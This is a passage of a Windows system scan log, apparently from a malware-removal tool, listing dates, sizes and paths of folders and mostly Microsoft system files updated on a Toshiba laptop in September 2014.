2014-10-01 08:48 - 2012-10-25 16:00 - 00000000 ____D () C:\windows\System32\Tasks\TOSHIBA
2014-10-01 08:48 - 2012-10-25 15:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRS Labs
2014-10-01 08:48 - 2012-10-25 15:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD VISION Engine Control Center
2014-10-01 08:48 - 2012-08-18 04:31 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-10-01 08:48 - 2012-08-18 04:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2014-10-01 08:48 - 2012-08-18 04:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\windows\ImmersiveControlPanel
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\WinMetadata
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\registration
2014-10-01 08:48 - 2012-07-26 01:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-01 07:52 - 2012-12-18 23:25 - 00000000 ___HD () C:\Users\Jeremy and Heidi
2014-09-29 12:47 - 2014-09-12 21:56 - 00019800 _____ () C:\windows\system32\roboot64.exe
2014-09-25 20:29 - 2014-07-30 20:56 - 00000000 ____D () C:\Users\Jeremy and Heidi\Documents\Bandicam
2014-09-24 15:35 - 2012-07-25 22:37 - 00000000 __RHD () C:\Users\Default
2014-09-24 12:27 - 2014-05-18 20:50 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Origin
2014-09-24 12:26 - 2014-08-14 16:49 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\SlimWare Utilities Inc
2014-09-24 12:25 - 2012-12-18 23:28 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\TOSHIBA
2014-09-24 09:10 - 2014-08-03 17:36 - 00000000 ____D () C:\Users\Jeremy and Heidi\Documents\Bandicut
2014-09-23 14:35 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\NDF
2014-09-16 18:07 - 2014-07-12 10:50 - 00129024 ___SH () C:\Users\Jeremy and Heidi\Downloads\Thumbs.db
2014-09-16 02:09 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\rescache
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\windows\ToastData
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\PolicyDefinitions
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Defender
2014-09-15 16:16 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2014-09-15 16:15 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal
2014-09-15 16:15 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\oobe
2014-09-15 16:13 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer
2014-09-15 16:13 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer
2014-09-15 16:13 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\SysWOW64\Dism
2014-09-15 16:13 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\Dism
2014-09-15 13:51 - 2014-06-29 13:33 - 00997632 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ndis.sys
2014-09-15 13:49 - 2014-06-29 13:33 - 02391280 _____ (Microsoft Corporation) C:\windows\explorer.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 02106176 _____ (Microsoft Corporation) C:\windows\SysWOW64\explorer.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 01842176 _____ (Microsoft Corporation) C:\windows\SysWOW64\dwmcore.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 01527808 _____ (Microsoft Corporation) C:\windows\system32\mfcore.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 01453568 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfcore.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 01403296 _____ (Microsoft Corporation) C:\windows\system32\winload.efi
2014-09-15 13:49 - 2014-06-29 13:33 - 01271584 _____ (Microsoft Corporation) C:\windows\system32\winload.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 01217352 _____ (Microsoft Corporation) C:\windows\system32\winresume.efi
2014-09-15 13:49 - 2014-06-29 13:33 - 01093904 _____ (Microsoft Corporation) C:\windows\system32\winresume.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 01048576 _____ (Microsoft Corporation) C:\windows\system32\mfasfsrcsnk.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00850944 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfasfsrcsnk.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00785408 _____ (Microsoft Corporation) C:\windows\system32\audiosrv.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00729600 _____ (Microsoft Corporation) C:\windows\system32\samsrv.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00680960 _____ (Microsoft Corporation) C:\windows\system32\vds.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 00583168 _____ (Microsoft Corporation) C:\windows\system32\mscms.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscms.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00207872 _____ (Microsoft Corporation) C:\windows\system32\DeviceSetupManager.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00190976 _____ (Microsoft Corporation) C:\windows\system32\vdsutil.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00106496 _____ (Microsoft Corporation) C:\windows\system32\samlib.dll
2014-09-15 13:49 - 2014-06-29 13:33 - 00080896 _____ (Microsoft Corporation) C:\windows\system32\MbaeParserTask.exe
2014-09-15 13:49 - 2014-06-29 13:33 - 00067584 _____ (Microsoft Corporation) C:\windows\SysWOW64\samlib.dll
2014-09-15 13:48 - 2014-06-29 13:33 - 02219520 _____ (Microsoft Corporation) C:\windows\system32\dwmcore.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 02094592 _____ (Microsoft Corporation) C:\windows\system32\mmc.exe
2014-09-15 13:35 - 2014-06-29 13:28 - 01964544 _____ (Microsoft Corporation) C:\windows\system32\wlidsvc.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 01886208 _____ (Microsoft Corporation) C:\windows\system32\setupapi.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 01752064 _____ (Microsoft Corporation) C:\windows\SysWOW64\setupapi.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00894464 _____ (Microsoft Corporation) C:\windows\system32\iphlpsvc.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00261120 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Media.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00171520 _____ (Microsoft Corporation) C:\windows\system32\ncbservice.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00107520 _____ (Microsoft Corporation) C:\windows\system32\httpprxm.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00062464 _____ (Microsoft Corporation) C:\windows\system32\adhsvc.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00022528 _____ (Microsoft Corporation) C:\windows\system32\adhapi.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00017920 _____ (Microsoft Corporation) C:\windows\system32\httpprxp.dll
2014-09-15 13:35 - 2014-06-29 13:28 - 00015872 _____ (Microsoft Corporation) C:\windows\system32\keepaliveprovider.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 01611776 _____ (Microsoft Corporation) C:\windows\SysWOW64\mmc.exe
2014-09-15 13:34 - 2014-06-29 13:28 - 00666112 _____ (Microsoft Corporation) C:\windows\system32\MP4SDECD.DLL
2014-09-15 13:34 - 2014-06-29 13:28 - 00436736 _____ (Microsoft Corporation) C:\windows\SysWOW64\MP4SDECD.DLL
2014-09-15 13:34 - 2014-06-29 13:28 - 00406016 _____ (Microsoft Corporation) C:\windows\system32\Windows.Media.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 00256000 _____ (Microsoft Corporation) C:\windows\system32\WSDMon.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 00159232 _____ (Microsoft Corporation) C:\windows\system32\inetpp.dll
2014-09-15 13:34 - 2014-06-29 13:28 - 00095232 _____ (Microsoft Corporation) C:\windows\system32\wiaacmgr.exe
2014-09-15 13:34 - 2014-06-29 13:28 - 00091880 _____ (Microsoft Corporation) C:\windows\system32\Drivers\partmgr.sys
2014-09-15 13:34 - 2014-06-29 13:28 - 00083968 _____ (Microsoft Corporation) C:\windows\SysWOW64\wiaacmgr.exe
2014-09-15 13:29 - 2014-06-29 13:27 - 01160192 _____ (Microsoft Corporation) C:\windows\system32\IKEEXT.DLL
2014-09-15 13:29 - 2014-06-29 13:27 - 00723968 _____ (Microsoft Corporation) C:\windows\system32\BFE.DLL
2014-09-15 13:29 - 2014-06-29 13:27 - 00096600 _____ (Microsoft Corporation) C:\windows\system32\Drivers\wfplwfs.sys
2014-09-15 13:27 - 2014-06-29 13:27 - 04917760 _____ (Microsoft Corporation) C:\windows\system32\sppsvc.exe
2014-09-15 13:27 - 2014-06-29 13:27 - 02371728 _____ (Microsoft Corporation) C:\windows\system32\WSService.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 01164288 _____ (Microsoft Corporation) C:\windows\system32\sppobjs.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00368640 _____ (Microsoft Corporation) C:\windows\system32\sppwinob.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00204800 _____ (Microsoft Corporation) C:\windows\system32\WSClient.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00183808 _____ (Microsoft Corporation) C:\windows\system32\WSSync.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00167424 _____ (Microsoft Corporation) C:\windows\SysWOW64\WSClient.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00159232 _____ (Microsoft Corporation) C:\windows\SysWOW64\WSSync.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00120320 _____ (Microsoft Corporation) C:\windows\system32\sppc.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00091648 _____ (Microsoft Corporation) C:\windows\SysWOW64\sppc.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00083968 _____ () C:\windows\SysWOW64\OEMLicense.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00081408 _____ (Microsoft Corporation) C:\windows\system32\setupcln.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00076800 _____ (Microsoft Corporation) C:\windows\SysWOW64\setupcln.dll
2014-09-15 13:27 - 2014-06-29 13:27 - 00058200 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dam.sys
2014-09-15 13:25 - 2014-06-29 13:25 - 03246592 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-09-15 13:25 - 2014-06-29 13:25 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\rdpudd.dll
2014-09-15 13:23 - 2014-06-29 13:25 - 00619008 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srv2.sys
2014-09-15 13:23 - 2014-06-29 13:25 - 00387268 _____ () C:\windows\system32\ApnDatabase.xml
2014-09-15 13:23 - 2014-06-29 13:25 - 00309760 _____ (Microsoft Corporation) C:\windows\system32\wusa.exe
2014-09-15 13:23 - 2014-06-29 13:25 - 00305152 _____ (Microsoft Corporation) C:\windows\SysWOW64\wusa.exe
2014-09-15 13:22 - 2014-06-29 13:25 - 00062976 _____ (Microsoft Corporation) C:\windows\system32\imagehlp.dll
2014-09-15 13:22 - 2014-06-29 13:25 - 00059392 _____ (Microsoft Corporation) C:\windows\SysWOW64\imagehlp.dll
2014-09-15 13:20 - 2014-06-29 13:25 - 00652288 _____ (Microsoft Corporation) C:\windows\system32\comctl32.dll
2014-09-15 13:20 - 2014-06-29 13:25 - 00541696 _____ (Microsoft Corporation) C:\windows\SysWOW64\comctl32.dll
2014-09-15 13:17 - 2014-07-09 22:46 - 01557504 _____ (Microsoft Corporation) C:\windows\system32\osk.exe
2014-09-15 13:17 - 2014-07-09 22:46 - 01440256 _____ (Microsoft Corporation) C:\windows\SysWOW64\osk.exe
2014-09-15 13:14 - 2014-05-14 20:49 - 19759104 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2014-09-15 13:14 - 2014-05-14 20:49 - 17562112 _____ (Microsoft Corporation) C:\windows\SysWOW64\shell32.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 01281536 _____ (Microsoft Corporation) C:\windows\system32\lsasrv.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 00588288 _____ (Microsoft Corporation) C:\windows\system32\SHCore.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 00452608 _____ (Microsoft Corporation) C:\windows\SysWOW64\SHCore.dll
2014-09-15 13:12 - 2014-07-09 22:46 - 00439808 _____ (Microsoft Corporation) C:\windows\system32\lsm.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00778752 _____ (Microsoft Corporation) C:\windows\system32\oleaut32.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00626688 _____ (Microsoft Corporation) C:\windows\system32\resutils.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00551424 _____ (Microsoft Corporation) C:\windows\SysWOW64\oleaut32.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00488960 _____ (Microsoft Corporation) C:\windows\SysWOW64\resutils.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00374784 _____ (Microsoft Corporation) C:\windows\system32\clusapi.dll
2014-09-15 13:06 - 2014-06-29 13:23 - 00302080 _____ (Microsoft Corporation) C:\windows\SysWOW64\clusapi.dll
2014-09-15 13:03 - 2014-05-14 20:49 - 00269592 _____ (Microsoft Corporation) C:\windows\system32\Drivers\WdFilter.sys
2014-09-15 13:03 - 2014-05-14 20:49 - 00035856 _____ (Microsoft Corporation) C:\windows\system32\Drivers\WdBoot.sys
2014-09-15 13:02 - 2014-06-29 13:22 - 00600064 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-09-15 13:02 - 2014-06-29 13:22 - 00523776 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2014-09-15 12:55 - 2014-06-29 13:23 - 13661696 _____ (Microsoft Corporation) C:\windows\system32\Windows.UI.Xaml.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 01173504 _____ (Microsoft Corporation) C:\windows\system32\UIAutomationCore.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00914432 _____ (Microsoft Corporation) C:\windows\SysWOW64\UIAutomationCore.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00465240 _____ (Microsoft Corporation) C:\windows\system32\Drivers\fvevol.sys
2014-09-15 12:55 - 2014-06-29 13:22 - 00328192 _____ (Microsoft Corporation) C:\windows\system32\ubpm.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00247296 _____ (Microsoft Corporation) C:\windows\SysWOW64\ubpm.dll
2014-09-15 12:55 - 2014-06-29 13:22 - 00061784 _____ (Microsoft Corporation) C:\windows\system32\Drivers\crashdmp.sys
2014-09-15 12:55 - 2014-06-29 13:22 - 00020992 _____ (Microsoft Corporation) C:\windows\SysWOW64\wups.dll
2014-09-15 12:54 - 2014-06-29 13:22 - 10799104 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.UI.Xaml.dll
2014-09-15 12:54 - 2014-06-29 13:22 - 00049664 _____ (Microsoft Corporation) C:\windows\system32\wups.dll
2014-09-15 12:51 - 2014-06-29 13:21 - 00785624 _____ (Microsoft Corporation) C:\windows\system32\Drivers\Wdf01000.sys
2014-09-15 12:51 - 2014-06-29 13:21 - 00054488 _____ (Microsoft Corporation) C:\windows\system32\Drivers\WdfLdr.sys
2014-09-15 12:46 - 2014-06-29 13:16 - 02273792 _____ (Microsoft Corporation) C:\windows\SysWOW64\msftedit.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00439488 _____ (Microsoft Corporation) C:\windows\system32\WerFault.exe
2014-09-15 12:46 - 2014-06-29 13:16 - 00312832 _____ (Microsoft Corporation) C:\windows\system32\LocationApi.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00245760 _____ (Microsoft Corporation) C:\windows\SysWOW64\LocationApi.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00183808 _____ (Microsoft Corporation) C:\windows\system32\winmmbase.dll
2014-09-15 12:46 - 2014-06-29 13:16 - 00120144 _____ (Microsoft Corporation) C:\windows\system32\Drivers\msgpioclx.sys
2014-09-15 12:46 - 2014-06-29 13:16 - 00115712 _____ (Microsoft Corporation) C:\windows\system32\winmm.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 02839552 _____ (Microsoft Corporation) C:\windows\system32\msftedit.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00888832 _____ (Microsoft Corporation) C:\windows\system32\nshwfp.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00702464 _____ (Microsoft Corporation) C:\windows\SysWOW64\nshwfp.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00543744 _____ (Microsoft Corporation) C:\windows\system32\wwanmm.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00447488 _____ (Microsoft Corporation) C:\windows\system32\wwansvc.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00414208 _____ (Microsoft Corporation) C:\windows\system32\wwanconn.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00391168 _____ (Microsoft Corporation) C:\windows\system32\Windows.Networking.BackgroundTransfer.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00385768 _____ (Microsoft Corporation) C:\windows\SysWOW64\WerFault.exe
2014-09-15 12:45 - 2014-06-29 13:16 - 00381952 _____ (Microsoft Corporation) C:\windows\system32\FWPUCLNT.DLL
2014-09-15 12:45 - 2014-06-29 13:16 - 00370688 _____ (Microsoft Corporation) C:\windows\system32\Wwanadvui.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00321536 _____ (Microsoft Corporation) C:\windows\system32\Drivers\udfs.sys
2014-09-15 12:45 - 2014-06-29 13:16 - 00268800 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00263680 _____ (Microsoft Corporation) C:\windows\system32\wcmsvc.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00245248 _____ (Microsoft Corporation) C:\windows\SysWOW64\FWPUCLNT.DLL
2014-09-15 12:45 - 2014-06-29 13:16 - 00230912 _____ (Microsoft Corporation) C:\windows\system32\WinSCard.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00160256 _____ (Microsoft Corporation) C:\windows\SysWOW64\winmmbase.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00154112 _____ (Microsoft Corporation) C:\windows\SysWOW64\WinSCard.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00125440 _____ (Microsoft Corporation) C:\windows\SysWOW64\winmm.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\openfiles.exe
2014-09-15 12:45 - 2014-06-29 13:16 - 00074240 _____ (Microsoft Corporation) C:\windows\system32\wcmcsp.dll
2014-09-15 12:45 - 2014-06-29 13:16 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\openfiles.exe
2014-09-15 12:39 - 2014-06-29 13:20 - 01338880 _____ (Microsoft Corporation) C:\windows\SysWOW64\WindowsCodecs.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00645120 _____ (Microsoft Corporation) C:\windows\system32\Windows.Security.Authentication.OnlineId.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00550912 _____ (Microsoft Corporation) C:\windows\SysWOW64\drvstore.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00504320 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\netcfgx.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00245248 _____ (Microsoft Corporation) C:\windows\system32\usbmon.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00180224 _____ (Microsoft Corporation) C:\windows\system32\SystemEventsBrokerServer.dll
2014-09-15 12:39 - 2014-06-29 13:19 - 00156160 _____ (Microsoft Corporation) C:\windows\system32\powercfg.cpl
2014-09-15 12:39 - 2014-06-29 13:19 - 00103936 _____ (Microsoft Corporation) C:\windows\system32\wpdbusenum.dll
2014-09-15 12:38 - 2014-06-29 13:20 - 01627648 _____ (Microsoft Corporation) C:\windows\system32\WindowsCodecs.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 01149952 _____ (Microsoft Corporation) C:\windows\system32\winmde.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00951808 _____ (Microsoft Corporation) C:\windows\system32\Windows.Globalization.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00893952 _____ (Microsoft Corporation) C:\windows\SysWOW64\winmde.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00703488 _____ (Microsoft Corporation) C:\windows\system32\drvstore.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\netcfgx.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00171008 _____ (Microsoft Corporation) C:\windows\system32\TimeBrokerServer.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00150016 _____ (Microsoft Corporation) C:\windows\system32\discan.dll
2014-09-15 12:38 - 2014-06-29 13:19 - 00145408 _____ (Microsoft Corporation) C:\windows\SysWOW64\powercfg.cpl
2014-09-15 12:38 - 2014-06-29 13:19 - 00117248 _____ (Microsoft Corporation) C:\windows\system32\NdisImPlatform.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 01101824 _____ (Microsoft Corporation) C:\windows\system32\wmpmde.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 00601088 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Globalization.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 00071168 _____ (Microsoft Corporation) C:\windows\system32\WSDPrintProxy.DLL
2014-09-15 12:37 - 2014-06-29 13:19 - 00049152 _____ (Microsoft Corporation) C:\windows\system32\DevDispItemProvider.dll
2014-09-15 12:37 - 2014-06-29 13:19 - 00036352 _____ (Microsoft Corporation) C:\windows\SysWOW64\DevDispItemProvider.dll
2014-09-15 12:32 - 2014-06-29 13:15 - 01890816 _____ (Microsoft Corporation) C:\windows\system32\crypt32.dll
2014-09-15 12:32 - 2014-06-29 13:15 - 01569280 _____ (Microsoft Corporation) C:\windows\SysWOW64\crypt32.dll
2014-09-15 12:25 - 2014-07-09 22:46 - 00265216 _____ (Microsoft Corporation) C:\windows\system32\InkEd.dll
2014-09-15 12:20 - 2014-06-29 13:14 - 01255936 _____ (Microsoft Corporation) C:\windows\system32\certutil.exe
2014-09-15 12:20 - 2014-06-29 13:14 - 01013248 _____ (Microsoft Corporation) C:\windows\SysWOW64\certutil.exe
2014-09-15 12:19 - 2014-06-29 13:14 - 00141312 _____ (Microsoft Corporation) C:\windows\system32\cryptnet.dll
2014-09-15 12:19 - 2014-06-29 13:14 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptnet.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00362496 _____ (Adobe Systems Incorporated) C:\windows\system32\atmfd.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00300032 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\atmfd.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00046080 _____ (Adobe Systems) C:\windows\system32\atmlib.dll
2014-09-15 11:44 - 2014-06-29 13:12 - 00035328 _____ (Adobe Systems) C:\windows\SysWOW64\atmlib.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00567808 _____ (Microsoft Corporation) C:\windows\SysWOW64\duser.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00475136 _____ (Microsoft Corporation) C:\windows\system32\WWanAPI.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00385024 _____ (Microsoft Corporation) C:\windows\system32\ncsi.dll
2014-09-15 11:39 - 2014-06-29 13:12 - 00080896 _____ (Microsoft Corporation) C:\windows\SysWOW64\tasklist.exe
2014-09-15 11:39 - 2014-06-29 13:12 - 00079360 _____ (Microsoft Corporation) C:\windows\SysWOW64\taskkill.exe
2014-09-15 11:38 - 2014-06-29 13:12 - 00729600 _____ (Microsoft Corporation) C:\windows\system32\duser.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00611840 _____ (Microsoft Corporation) C:\windows\system32\wpd_ci.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00543232 _____ (Microsoft Corporation) C:\windows\system32\wlroamextension.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00410624 _____ (Microsoft Corporation) C:\windows\SysWOW64\wlroamextension.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00370688 _____ (Microsoft Corporation) C:\windows\SysWOW64\WWanAPI.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00297984 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ks.sys
2014-09-15 11:38 - 2014-06-29 13:12 - 00293376 _____ (Microsoft Corporation) C:\windows\system32\Windows.Networking.Connectivity.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00260096 _____ (Microsoft Corporation) C:\windows\system32\hotspotauth.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00197632 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Networking.Connectivity.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00107520 _____ (Microsoft Corporation) C:\windows\system32\taskkill.exe
2014-09-15 11:38 - 2014-06-29 13:12 - 00102400 _____ (Microsoft Corporation) C:\windows\system32\tasklist.exe
2014-09-15 11:38 - 2014-06-29 13:12 - 00087552 _____ (Microsoft Corporation) C:\windows\system32\wersvc.dll
2014-09-15 11:38 - 2014-06-29 13:12 - 00055296 _____ (Microsoft Corporation) C:\windows\SysWOW64\nlaapi.dll
2014-09-15 11:33 - 2014-06-29 13:12 - 01690624 _____ (Microsoft Corporation) C:\windows\system32\GdiPlus.dll
2014-09-15 11:33 - 2014-06-29 13:12 - 01437184 _____ (Microsoft Corporation) C:\windows\SysWOW64\GdiPlus.dll
2014-09-15 11:31 - 2014-06-29 13:12 - 01838080 _____ (Microsoft Corporation) C:\windows\system32\DWrite.dll
2014-09-15 11:31 - 2014-06-29 13:12 - 01421312 _____ (Microsoft Corporation) C:\windows\SysWOW64\DWrite.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 01043968 _____ (Microsoft Corporation) C:\windows\system32\usercpl.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00982016 _____ (Microsoft Corporation) C:\windows\system32\KernelBase.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00827904 _____ (Microsoft Corporation) C:\windows\system32\kerberos.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00684032 _____ (Microsoft Corporation) C:\windows\system32\objsel.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00668160 _____ (Microsoft Corporation) C:\windows\SysWOW64\KernelBase.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00666624 _____ (Microsoft Corporation) C:\windows\SysWOW64\kerberos.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00578048 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-09-15 11:29 - 2014-05-14 20:47 - 00570216 _____ (Microsoft Corporation) C:\windows\system32\Drivers\cng.sys
2014-09-15 11:29 - 2014-05-14 20:47 - 00323072 _____ (Microsoft Corporation) C:\windows\SysWOW64\schannel.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00273920 _____ (Microsoft Corporation) C:\windows\SysWOW64\msv1_0.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00179712 _____ (Microsoft Corporation) C:\windows\system32\dpapisrv.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00172888 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ksecpkg.sys
